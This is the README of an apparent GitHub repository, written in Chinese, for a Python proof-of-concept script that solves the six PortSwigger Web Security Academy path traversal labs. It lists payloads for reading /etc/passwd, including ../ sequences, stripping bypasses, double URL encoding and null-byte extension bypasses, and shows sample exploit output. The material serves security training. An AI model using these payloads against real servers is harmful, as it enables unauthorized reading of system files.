0xtonyr/Web-Security-Academy-path-traversal-exploit-POCs

## 路径遍历漏洞利用PoC - PortSwigger Web安全学院 本仓库包含一个Python 3脚本，用于利用PortSwigger Web安全学院[路径遍历模块](https://portswigger.net/web-security/file-path-traversal)中涵盖的路径遍历漏洞。 ## 涵盖的实验 | 实验 | 技术 | |-----|-----------| | 1 | 简单情况 (`../../../etc/passwd`) | | 2 | 绝对路径绕过 (`/etc/passwd`) | | 3 | 序列剥离 — 非递归 (`....//....//`) | | 4 | 序列剥离 — 双重URL编码 (`..%252f`) | | 5 | 路径起始验证 (`/var/www/images/../../../`) | | 6 | 文件扩展名验证绕过 — 空字节 (`%00.png`) | ## 安装说明 ``` pip install -r requirements.txt ``` ## 使用方法 **单个实验：** ``` python3 path-traversal.py --lab <1-6> ``` **尝试所有payload：** ``` python3 path-traversal.py --all ``` **示例：** ``` python3 path-traversal.py https://0ae3006003d254ce83aeaff4003a009d.web-security-academy.net/ --lab 1 [*] Connecting to target: https://0ae3006003d254ce83aeaff4003a009d.web-security-academy.net [*] Session cookie collected. Starting exploit... [+] Lab 1 exploited successfully! (Simple case) root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin ``` ## 参考资料 - https://portswigger.net/web-security/file-path-traversal - https://portswigger.net/web-security/all-labs#path-traversal

标签：CISA项目, Gradle, PoC, PortSwigger, URL编码, Web安全, 安全实验室, 安全漏洞, 文件包含漏洞, 文件系统访问, 暴力破解, 漏洞测试, 空字节绕过, 编码绕过, 网络安全, 蓝队分析, 路径遍历, 逆向工具, 隐私保护